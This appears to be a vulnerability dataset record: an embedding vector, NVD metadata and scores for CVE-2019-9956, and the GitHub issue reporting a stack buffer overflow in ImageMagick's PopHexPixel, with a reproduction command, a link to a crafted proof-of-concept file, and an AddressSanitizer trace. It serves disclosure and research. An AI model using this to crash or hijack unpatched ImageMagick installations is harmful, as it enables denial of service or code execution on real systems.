0.01194295659661293, 0.009761561639606953, -0.007718783337622881, 0.003950587008148432, 0.01731984131038189, 0.0351649671792984, -0.002604542300105095, -0.0068907286040484905, 0.008769354782998562, 0.01483202911913395, 0.00420593423768878, -0.003390647005289793, 0.0021832191850990057, -0.02508239820599556, 0.027650462463498116, 0.004993862938135862, 0.0007332114619202912, 0.01216182578355074, 0.016444364562630653, -0.003188193077221513, 0.0002986651088576764, -0.0005471727345138788, 0.0029747956432402134, -0.015714799985289574, -0.026658255606889725, -0.0296640582382679, 0.007120541296899319, 0.007011106703430414, 0.010906976647675037, -0.015072784386575222, 0.0057234265841543674, 0.0076093487441539764, -0.012118051759898663, -0.0025279379915446043, -0.018851924687623978, 0.0351649671792984, -0.007499914150685072, -0.01818072609603405, 0.0024768684525042772, -0.021682631224393845, 0.02338981069624424, 0.014788255095481873, 0.021522127091884613, -0.011833522468805313, 0.01479555107653141, 0.02607460506260395, -0.010031499899923801, -0.0018640351481735706, 0.0005458047962747514, 0.024790572002530098, -0.0020518978126347065, -0.00799601711332798, -0.0026154855731874704, 0.013664727099239826, 0.019887905567884445, 0.006733872462064028, 0.01831204816699028, 0.009914769791066647, 0.012636042200028896, 0.023608678951859474, 0.004257003776729107, -0.015393792651593685, 0.021828543394804, 0.01028684712946415, 0.005460783839225769, -0.004443042445927858, -0.01901242882013321, -0.009995021857321262, 0.01272359024733305, 0.012533903121948242, -0.010958045721054077, -0.012023208662867546, -0.004939145874232054, 0.028248704969882965, 0.02435283362865448, -0.005792735144495964, 0.016604868695139885, 0.02286452427506447, 0.02063206024467945, 0.0025899510364979506, -0.003693416016176343, -0.00981992669403553, -0.0008006960852071643, -0.007886582985520363, 0.003231966868042946, -0.016969650983810425, -0.0033833514899015427, 0.009484327398240566, -0.022003639489412308, 0.013066484592854977, -0.007587461732327938, -0.0030349846929311752, -0.00963753554970026, 0.005931352265179157, -0.000258767104241997, 0.003709831042215228, -0.006843307055532932, 0.008798537775874138, -0.0035438553895801306, 0.013876300305128098, -0.025432588532567024, -0.008025200106203556, -0.008813128806650639, -0.002772341948002577, 0.017509527504444122, 0.006434751208871603, -0.020675834268331528, 0.002600894309580326, -0.022339237853884697, -0.025636866688728333, -0.02365245297551155, 0.02464465983211994, -0.030437394976615906, 0.007200792897492647, -0.0024476859252899885, -0.008258660323917866, 0.00714242784306407, 0.01292057242244482, -0.023929687216877937, -0.014656933955848217, 0.010578672401607037, -0.03706183284521103, 0.009892882779240608, -0.007769852876663208, -0.0068542505614459515, -0.009725083597004414, 0.006095504388213158, -0.007740670349448919, 0.014540202915668488, 0.024527929723262787, -0.0011399431386962533, 0.015539705753326416, 0.00416216067969799, 0.004490463994443417, 0.004169456195086241, -0.010206595063209534, -0.016210904344916344, 0.004209582228213549, 0.015816939994692802, -0.023083394393324852, -0.00001497600351285655, -0.012336920946836472, -0.02312716655433178, 0.005267449654638767, 0.03659491240978241, 0.012015913613140583, 0.01857469044625759, 0.004964680410921574, -0.0020135955419391394, -0.015904488041996956, -0.00709865428507328, 0.003673352999612689, -0.006150221452116966, 0.015422975644469261, -0.003062343457713723, 0.0016141595551744103, -0.01549593172967434, 0.009046589024364948, -0.011899182572960854, 0.012285851873457432, 0.03192570433020592, -0.01250472106039524, -0.02432365156710148, -0.012577677145600319, 0.011293645016849041, 0.003689768025651574, -0.010892384685575962, -0.008017904125154018, -0.019260480999946594, 0.015393792651593685, 0.00925816223025322, 0.017772169783711433, -0.009659422561526299, -0.008462938480079174, -0.013723092153668404, -0.012701703235507011, 0.018851924687623978, -0.003538383636623621, 0.0001005429876386188, 0.006022547837346792, -0.013292649760842323, 0.006803181022405624, -0.012643338181078434, -0.011862704530358315, -0.0006702865939587355, -0.015554296784102917, -0.005077762994915247, 0.013248875737190247, -0.002688442124053836, 0.007343058008700609, -0.01924588903784752, -0.01659027673304081, -0.011913774535059929, 0.005230971146374941, -0.024805163964629173, -0.005949591286480427, -0.010921567678451538, -0.0007455228478647768, -0.01971280947327614, 0.021142754703760147, 0.039104610681533813, 0.0100023178383708, -0.005905817728489637, 0.015408383682370186, 0.010782950557768345, 0.01820990815758705, -0.0011873648036271334, 0.020792564377188683, -0.005307575687766075, 0.015743983909487724, 0.007317523472011089, -0.002230640733614564, 0.005986069794744253, 0.009498918429017067, -0.015671027824282646, 0.005876635201275349, 0.007459788117557764, -0.0024385664146393538, 0.007850104942917824, 0.02909499779343605, 0.006139277946203947, -0.00043705423013307154, -0.008389981463551521, -0.00944055337458849, -0.03604044392704964, -0.013431266881525517, 0.020354826003313065, 0.0025078749749809504, -0.01259226817637682, -0.021317848935723305, 0.023769183084368706, -0.005333110224455595, -0.0008759323391132057, -0.0010779303265735507, -0.020850928500294685, -0.01504360232502222, 0.012351511977612972, -0.0030058021657168865, 0.009688605554401875, 0.006321669090539217, 0.0050960020162165165, -0.018093178048729897, 0.011789748445153236, 0.0064931162633001804, 0.001280384138226509, 0.02023809589445591, -0.002856241539120674, 0.015714799985289574, -0.00037070951657369733, -0.010600559413433075, -0.014321334660053253, -0.007248214911669493, 0.0015567063819617033, -0.015058193355798721, 0.004939145874232054, -0.007594757713377476, 0.013044597581028938, 0.010979932732880116, 0.009214389137923717, -0.008630737662315369, 0.008112747222185135, 0.015977444127202034, 0.0315171480178833, 0.00859425961971283, 0.02292289026081562, -0.0014016741188243032, 0.02438201755285263, -0.007372240535914898, -0.004479520954191685, 0.01834123022854328, -0.01622549444437027, 0.02255810797214508, 0.009250867180526257, -0.021142754703760147, -0.019800357520580292, 0.001891393680125475, 0.00832432135939598, 0.006587959825992584, 0.00944055337458849, -0.029780788347125053, 0.01187729649245739, -0.0027741657104343176, 0.026030831038951874, 0.003474546829238534, 0.009462440386414528, -0.0033651122357696295, -0.002524290233850479, -0.007065823767334223, -0.0016378703294321895, 0.020617468282580376, -0.027285680174827576, 0.01930425316095352, -0.01232232991605997, 0.011862704530358315, -0.01192836556583643, 0.004001656547188759, 0.031108593568205833, -0.01914374902844429, -0.008426460437476635, -0.010994523763656616, -0.0005179902072995901, 0.004526942502707243, 0.015437566675245762, 0.0047640507109463215, -0.0006114655407145619, 0.0046728551387786865, -0.0024677489418536425, 0.0007596581126563251, 0.004691094160079956, -0.0025425292551517487, 0.011191505938768387, -0.0096740135923028, -0.005500909872353077, 0.0024549816735088825, -0.0034891380928456783, -0.017728395760059357, 0.01272359024733305, -0.009725083597004414, 0.007616644259542227, -0.03341401368379593, 0.015466748736798763, 0.015422975644469261, -0.0013624600833281875, -0.00033582726609893143, -0.0242506954818964, 0.00027244642842561007, -0.00023391634749714285, -0.0010660748230293393, 0.002704857150092721, 0.004519646521657705, 0.00032579575781710446, 0.01367202214896679, 0.012431764043867588, -0.008470233529806137, -0.004103795625269413, 0.012599564157426357, -0.017991039901971817, 0.00022206093126442283, 0.018195318058133125, 0.004377381876111031, 0.02289370633661747, 0.012023208662867546, -0.019027018919587135, -0.016181722283363342, -0.024279877543449402, 0.005530092399567366, -0.01398573536425829, 0.004957384895533323, -0.01669241674244404, 0.011337419040501118, -0.012147234752774239, 0.009601057507097721, 0.016779962927103043, -0.015525114722549915, 0.011848113499581814, 0.012796546332538128, 0.00014009901497047395, -0.025461770594120026, 0.002143093151971698, 0.005471727345138788, 0.011103958822786808, -0.0027851092163473368, -0.023915095254778862, 0.00938948430120945, 0.004311721306294203, -0.006380034144967794, 0.01197943463921547, 0.0024750446900725365, 0.012132643721997738, -0.009900178760290146, -0.003551150904968381, 0.009185206145048141, -0.016181722283363342, -0.024294469505548477, 0.008937154896557331, -0.002870833035558462, -0.0053659407421946526, 0.005088706500828266, -0.008995519950985909, -0.0015822411514818668, 0.004873485304415226, 0.006660915911197662, -0.005271097179502249, -0.012949754483997822, -0.02266024611890316, 0.009885587729513645, 0.01586071401834488, -0.0006192171131260693, 0.010410873219370842, -0.02352113090455532, -0.030145568773150444, 0.014868507161736488, -0.007937652058899403, 0.029343049973249435, 0.00859425961971283, -0.00045346940169110894, -0.0070038107223808765, -0.02763587050139904, -0.008207591250538826, 0.0008900676621124148, 0.01194295659661293, -0.005588457453995943, -0.004869837313890457, 0.00016369584773201495, -0.006186699494719505, 0.003866687184199691, 0.02763587050139904, -0.007769852876663208, 0.009528101421892643, 0.012876798398792744, -0.012657929211854935, 0.00544984033331275, -0.01320510171353817, 0.0007122365059331059, 0.0002048477908829227, -0.016736190766096115, -0.014620454981923103, 0.003884926438331604, -0.021186528727412224, -0.021755587309598923, -0.0036988877691328526, -0.0284675732254982, -0.007197145372629166, -0.010337917134165764, 0.008171113207936287, -0.006011604331433773, 0.011359306052327156, 0.007857399992644787, 0.01870601251721382, 0.01651732064783573, 0.0043956208974123, -0.011271758005023003, 0.006825068034231663, 0.009374892339110374, 0.009199797175824642, -0.004049078095704317, 0.018239090219140053, 0.015948262065649033, -0.02614756114780903, 0.009097659029066563, 0.0017418331699445844, -0.009002815000712872, 0.017363615334033966, -0.01028684712946415, -0.0029784436337649822, 0.00841186847537756, -0.019231297075748444, 0.0040563736110925674, 0.007193497382104397, 0.019450167194008827, -0.00394693948328495, 0.008477529510855675, 0.012030504643917084, -0.01168031431734562, 0.027913104742765427, 0.006102799903601408, 0.003115236759185791, -0.0009648479172028601, 0.008572372607886791, -0.008265956304967403, 0.0044685774482786655, 0.020354826003313065, 0.014722594060003757, -0.005077762994915247, 0.020748790353536606, -0.0013825230998918414, -0.022018231451511383, -0.008951745927333832, -0.008681807667016983, -0.00895904190838337, 0.014365107752382755, 0.0049537369050085545, 0.0035730379167944193, 0.0051324800588190556, -0.003571213921532035, 0.011548992246389389, -0.007667713798582554, 0.013781457208096981, 0.0038046743720769882, 0.007379536051303148, -0.01405139546841383, -0.011731383390724659, -0.012628746218979359, -0.011424966156482697, -0.02099684067070484, -0.022733202204108238, -0.012701703235507011, -0.01771380566060543, 0.013963848352432251, -0.016896693035960197, 0.0017235941486433148, 0.01588989607989788, 0.00987099576741457, 0.005158015061169863, -0.00903929304331541, -0.007952244020998478, -0.01363554410636425, -0.020748790353536606, 0.014175421558320522, 0.004548829514533281, 0.02365245297551155, 0.0060699693858623505, -0.011636540293693542, -0.002150388900190592, -0.00627789506688714, 0.0012740005040541291, -0.016269268468022346, 0.002396616619080305, -0.008732876740396023, 0.002546177012845874, -0.008499416522681713, 0.004884428344666958, 0.000699013180565089, 0.017640849575400352, -0.01622549444437027, 0.003801026614382863, 0.01189188752323389, 0.025096988305449486, 0.027095993980765343, -0.006190347485244274, -0.0021959864534437656, -0.011169618926942348, 0.02518453635275364, 0.009163319133222103, -0.013664727099239826, 0.03125450760126114, -0.004661911632865667, 0.007467083632946014, -0.001824821112677455, 0.003739013569429517, -0.025272084400057793, 0.021624267101287842, -0.002489635953679681, 0.008937154896557331, -0.01588989607989788, 0.00025922307395376265, 0.01924588903784752, 0.003629579208791256, -0.018954062834382057, -0.03855014219880104, 0.013081075623631477, -0.0021321496460586786, -0.02117193676531315, 0.0015393792418763041, -0.00029159747646190226, -0.013759570196270943, 0.0007683216826990247, -0.015466748736798763, 0.0019041610648855567, 0.019362619146704674, 0.020850928500294685, -0.001212899573147297, 0.012023208662867546, 0.02096765860915184, 0.01953771337866783, -0.003706183284521103, 0.014583976939320564, 0.013358309864997864, -0.012103460729122162, 0.017772169783711433, -0.010702698491513729, -0.0022762385196983814, 0.007000163197517395, 0.010549490340054035, 0.003837504656985402, 0.009827222675085068, 0.0019479349721223116, -0.009433258324861526, 0.009199797175824642, -0.0020135955419391394, -0.020296460017561913, 0.027592096477746964, -0.006489468738436699, 0.0074415490962564945, 0.0042752427980303764, 0.013642840087413788, -0.016925876960158348, -0.018239090219140053, -0.015568887814879417, 0.009075772017240524, 0.030700037255883217, 0.021784769371151924, 0.00920709315687418, 0.004599898587912321, 0.002533409744501114, 0.019070792943239212, -0.007937652058899403, -0.008667215704917908, 0.017436571419239044, 0.03399766609072685, 0.01052030734717846, 0.02766505256295204, 0.013547996990382671, 0.005814622156322002, 0.0019679979886859655, 0.021157344803214073, -0.00901011098176241, 0.009462440386414528, 0.009688605554401875, -0.024177739396691322, -0.00625236053019762, 0.010476534254848957, 0.034056030213832855, 0.02474679797887802, -0.0032410863786935806, -0.004016248043626547, -0.018297456204891205, 0.007354001514613628, 0.023273080587387085, -0.011490627191960812, -0.011490627191960812, -0.01599203422665596, 0.03490232303738594, -0.0025388814974576235, -0.020325643941760063, 0.025928691029548645, -0.0026829703710973263, -0.007146075833588839, 0.004796880763024092, 0.007036641240119934, -0.0014244730118662119, 0.006646324880421162, -0.014489133842289448, 0.006146573461592197, 0.010644333437085152, 0.0200046356767416, -0.011286349967122078, -0.00774796586483717, 0.007288340944796801, -0.007120541296899319, -0.019464757293462753, 0.024133965373039246, 0.004982919432222843, -0.0002977531694341451, -0.00690896762534976, -0.008572372607886791, -0.0021813951898366213, 0.007558279205113649, -0.009031997993588448, -0.017772169783711433, -0.008185704238712788, 0.011548992246389389, -0.015379201620817184, -0.001891393680125475, -0.020763380452990532, 0.026585299521684647, 0.027154358103871346, 0.006438399199396372, -0.009046589024364948, 0.00752180116251111, -0.010622446425259113, 0.008937154896557331, 0.014708003029227257, 0.0023236603010445833, -0.007842808961868286, -0.012045095674693584, -0.025899508967995644, 0.004902667831629515, -0.016940467059612274, 0.015291653573513031, 0.02409019134938717, 0.028350843116641045, -0.00014522876881528646, 0.011833522468805313, -0.014999828301370144, -0.014277560636401176, 0.006175755988806486, 0.003569390159100294, -0.0034909620881080627, 0.021886909380555153, -0.0039031654596328735, -0.00038621274870820343, -0.01874978467822075, 0.0033012754283845425, -0.00798142608255148, -0.027125176042318344, 0.013693909160792828, 0.010629742406308651, 0.004782289732247591, -0.00944055337458849, -0.004880780819803476, -0.014073282480239868, 0.009929360821843147, 0.00479323323816061, -0.007043936755508184, -0.006609846372157335, -0.00730657996609807, 0.014904985204339027, 0.008944449946284294, -0.017305249348282814, -0.0009447849006392062, -0.010374395176768303, 0.015452157706022263, -0.01353340595960617, -0.01742197945713997, 0.01459856890141964, -0.0025589445140212774, 0.008076269179582596, -0.01319051068276167, -0.021872317418456078, -0.012694407254457474, -0.0025480010081082582, -0.0004502775555010885, 0.01572939194738865, -0.04237305745482445, 0.007149723824113607, -0.0017819592030718923, -0.013409379869699478, 0.015116558410227299, 0.006963685154914856, 0.005566570442169905, 0.01381793525069952, -0.017801353707909584, 0.0018676829058676958, 0.0014226491330191493, 0.013489631935954094, 0.02687712386250496, -0.013453153893351555, 0.022047413513064384, -0.012577677145600319, -0.0019497588509693742, 0.019333437085151672, -0.0015603542560711503, -0.02554931864142418, 0.010812133550643921, -0.026833349838852882, -0.0046728551387786865, 0.03008720465004444, 0.005464431829750538, 0.019231297075748444, 0.010885089635848999, 0.0010405401699244976, 0.0010177412768825889, -0.012636042200028896, 0.018005630001425743, 0.00732481898739934, 0.0007345794001594186, -0.014138943515717983, -0.012315033935010433, -0.00651135528460145, -0.012052391655743122, -0.01599203422665596, 0.04704226180911064, 0.00018535475828684866, 0.012453651055693626, 0.019202115014195442, -0.013263466767966747, -0.004669207148253918, 0.005471727345138788, -0.009746970608830452, 0.0019880610052496195, -0.008601555600762367, -0.009075772017240524, -0.009367597289383411, -0.0005754433223046362, -0.026833349838852882, 0.010987228713929653, 0.004319016821682453, 0.004165808204561472, -0.0019296958344057202, -0.0044685774482786655, -0.012205599807202816, -0.00016665969451423734, 0.003571213921532035, 0.008929858915507793, 0.006708337459713221, -0.0034727228339761496, 0.004060021601617336, 0.023083394393324852, -0.008287843316793442, 0.006591607350856066, -0.030962681397795677, 0.020427782088518143, 0.01625467836856842, -0.0008909796015359461, 0.012643338181078434, 0.011038297787308693, 0.01030143816024065, 0.01126446295529604, 0.011964843608438969, -0.0028890720568597317, -0.018195318058133125, 0.012001321651041508, -0.0013788752257823944, -0.010564081370830536, -0.001898689428344369, 0.017028015106916428, 0.0023838491179049015, 0.01599203422665596, 0.006153869442641735, 0.013248875737190247, 0.017611665651202202, 0.016313042491674423, -0.005945943761616945, -0.016342226415872574, 0.028540529310703278, -0.012884093448519707, -0.0023710818495601416, 0.0036569377407431602, -0.018530916422605515, -0.016313042491674423, -0.01622549444437027, -0.015058193355798721, -0.007251862436532974, -0.011103958822786808, 0.013489631935954094, -0.02362327091395855, 0.0024513339158147573, 0.022616472095251083, 0.010761063545942307, -0.025024032220244408, 0.025038624182343483, -0.005734370090067387, -0.0004710245120804757, -0.01729065738618374, 0.01572939194738865, -0.011352010071277618, -0.0056468225084245205, 0.011636540293693542, -0.01659027673304081, 0.00588028272613883, -0.015525114722549915, 0.00130409502889961, -0.0003898605646099895, 0.013978439383208752, -0.013110258616507053, 0.003625931218266487, 0.0017381854122504592, 0.0008412780589424074, 0.010330621153116226, -0.013161327689886093, 0.026599889621138573, 0.01940639317035675, 0.002228816971182823, -0.007879287004470825, -0.008141930215060711, -0.0007186201983131468, -0.008980927988886833, -0.004687446169555187, -0.01189188752323389, 0.0033924710005521774, 0.008251364342868328, 0.019027018919587135, 0.012096164748072624, -0.0072226799093186855, 0.0019771174993366003, 0.016473546624183655, 0.015437566675245762, 0.020048409700393677, -0.012366103939712048, -0.018136952072381973, 0.01612335629761219, 0.011308236047625542, 0.008528598584234715, -0.018895698711276054, 0.005147071555256844, -0.010505716316401958, -0.006106447894126177, -0.002588127041235566, -0.0042132302187383175, -0.00036341388477012515, -0.008222182281315327, -0.008068974129855633, -0.0006994691211730242, 0.006617142353206873, 0.012665225192904472, 0.01437969971448183, -0.00027176245930604637, 0.008565077558159828, 0.0121253477409482, -0.004647320602089167, 0.00965212658047676, 0.011352010071277618, -0.005198141094297171, 0.024703023955225945, -0.0006096416036598384, 0.01802022196352482, 0.018618464469909668, -0.015598070807754993, 0.0020117717795073986, 0.016794554889202118, -0.006861546076834202, -0.004625433590263128, 0.06875407695770264, -0.030641673132777214, -0.015291653573513031, 0.004731220193207264, 0.0013177742948755622, 0.009228980168700218, 0.0033085711766034365, -0.004435746930539608, -0.01820990815758705, 0.007594757713377476, 0.020384008064866066, 0.010009612888097763, 0.008601555600762367, -0.0033286341931670904, 0.002312716795131564, -0.013679318130016327, 0.009754265658557415, 0.003968826029449701, 0.022645656019449234, -0.013715796172618866, 0.008003313094377518, -0.00816381722688675, 0.013971143402159214, 0.004319016821682453, -0.00015868009359110147, 0.0037353658117353916, -0.01731984131038189, -0.003379703499376774, -0.015904488041996956, 0.0048005287535488605, -0.002046426059678197, 0.005077762994915247, -0.004391972906887531, 0.015174923464655876, 0.0022014582064002752, 0.014788255095481873, -0.011176914907991886, -0.017144745215773582, 0.002456805668771267, 0.0033997665159404278, 0.028773989528417587, -0.002248879987746477, -0.002433094661682844, 0.04050537198781967, -0.00965212658047676, -0.01804940402507782, -0.00018296088092029095, 0.001075194450095296, -0.006307077594101429, -0.006106447894126177, -0.028671851381659508, 0.01688210293650627, 0.007138780318200588, 0.0029729718808084726, 0.014824733138084412, 0.03534006327390671, -0.014656933955848217, 0.0033432254567742348, 0.0007683216826990247, -0.0013387493090704083, -0.012424468994140625, 0.0023035972844809294, 0.02276238612830639 ]
95
CVE-2019-9956
2019-03-24T00:29:00.213000
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00010.html" }, { "source": "[email protected]", "tags": [ "VDB Entry", "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/107546" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/107672" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1523" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Apr/37" }, { "source": "[email protected]", "tags": null, "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4436" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:q16:*:*:*:*:*:*", "matchCriteriaId": "7D254272-9A50-4719-8FC1-3DB7E74B141F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1523
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a stack buffer overflow vulnerability in PopHexPixel of ps.c which could lead to code execution. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=15oA65eaHZi7lMmx6fJU2MkKQ8IlVBpBv) magick convert $poc ./test.ps `root@ubuntu:/home/test# ./ImageMagick_as/utilities/magick convert ./stack-buffer-overflow-in-ps ./test.ps` `=================================================================` `==80022==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0dc5d3c0 at pc 0x00000067e3f4 bp 0x7ffc0dc5c7d0 sp 0x7ffc0dc5c7c0` `WRITE of size 1 at 0x7ffc0dc5d3c0 thread T0` ` #0 0x67e3f3 in PopHexPixel coders/ps.c:1184` ` #1 0x682bf3 in WritePSImage coders/ps.c:2232` ` #2 0x84b8e7 in WriteImage MagickCore/constitute.c:1159` ` #3 0x84c60c in WriteImages MagickCore/constitute.c:1376` ` #4 0xbf328d in ConvertImageCommand MagickWand/convert.c:3305` ` #5 0xcdf3de in MagickCommandGenesis MagickWand/mogrify.c:184` ` #6 0x4103f1 in MagickMain utilities/magick.c:149` ` #7 0x4105d2 in main utilities/magick.c:180` ` #8 0x7fb06d32b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #9 0x40ff08 in _start (/home/.test/test/ImageMagick_as/utilities/magick+0x40ff08)` `` `Address 0x7ffc0dc5d3c0 is located in stack of thread T0 at offset 2752 in frame` ` #0 0x67e48e in WritePSImage coders/ps.c:1191` `` ` This frame has 13 object(s):` ` [32, 48) 'delta'` ` [96, 112) 'resolution'` ` [160, 176) 'scale'` ` [224, 256) 'geometry'` ` [288, 320) 'media_info'` ` [352, 384) 'page_info'` ` [416, 448) 'bounds'` ` [480, 520) 'geometry_info'` ` [576, 664) 'pixel'` ` [704, 2752) 'pixels' <== Memory access at offset 2752 overflows this variable` ` [2784, 6880) 'buffer'` ` [6912, 11008) 'date'` ` [11040, 15136) 'page_geometry'` `HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext` ` (longjmp and C++ exceptions *are* supported)` `SUMMARY: AddressSanitizer: stack-buffer-overflow coders/ps.c:1184 PopHexPixel` `Shadow bytes around the buggy address:` ` 0x100001b83a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` `=>0x100001b83a70: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 00 00 00 00` ` 0x100001b83a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` ` 0x100001b83ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==80022==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-35 Q16 x86_64 2019-03-22 https://imagemagick.org Copyright: ? 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.2 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
stack-buffer-overflow in PopHexPixel of ps.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1523/comments
5
2019-03-22T10:37:33
2019-03-26T09:38:55Z
https://github.com/ImageMagick/ImageMagick/issues/1523
424,144,480
1,523
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : stack-buffer-overflow in PopHexPixel of ps.c Issue date: --- start body --- ### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a stack buffer overflow vulnerability in PopHexPixel of ps.c which could lead to code execution. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=15oA65eaHZi7lMmx6fJU2MkKQ8IlVBpBv) magick convert $poc ./test.ps `root@ubuntu:/home/test# ./ImageMagick_as/utilities/magick convert ./stack-buffer-overflow-in-ps ./test.ps` `=================================================================` `==80022==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0dc5d3c0 at pc 0x00000067e3f4 bp 0x7ffc0dc5c7d0 sp 0x7ffc0dc5c7c0` `WRITE of size 1 at 0x7ffc0dc5d3c0 thread T0` ` #0 0x67e3f3 in PopHexPixel coders/ps.c:1184` ` #1 0x682bf3 in WritePSImage coders/ps.c:2232` ` #2 0x84b8e7 in WriteImage MagickCore/constitute.c:1159` ` #3 0x84c60c in WriteImages MagickCore/constitute.c:1376` ` #4 0xbf328d in ConvertImageCommand MagickWand/convert.c:3305` ` #5 0xcdf3de in MagickCommandGenesis MagickWand/mogrify.c:184` ` #6 0x4103f1 in MagickMain utilities/magick.c:149` ` #7 0x4105d2 in main utilities/magick.c:180` ` #8 0x7fb06d32b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #9 0x40ff08 in _start (/home/.test/test/ImageMagick_as/utilities/magick+0x40ff08)` `` `Address 0x7ffc0dc5d3c0 is located in stack of thread T0 at offset 2752 in frame` ` #0 0x67e48e in WritePSImage coders/ps.c:1191` `` ` This frame has 13 object(s):` ` [32, 48) 'delta'` ` [96, 112) 'resolution'` ` [160, 176) 'scale'` ` [224, 256) 'geometry'` ` [288, 320) 'media_info'` ` [352, 384) 'page_info'` ` [416, 448) 'bounds'` ` [480, 520) 'geometry_info'` ` [576, 664) 'pixel'` ` [704, 2752) 'pixels' 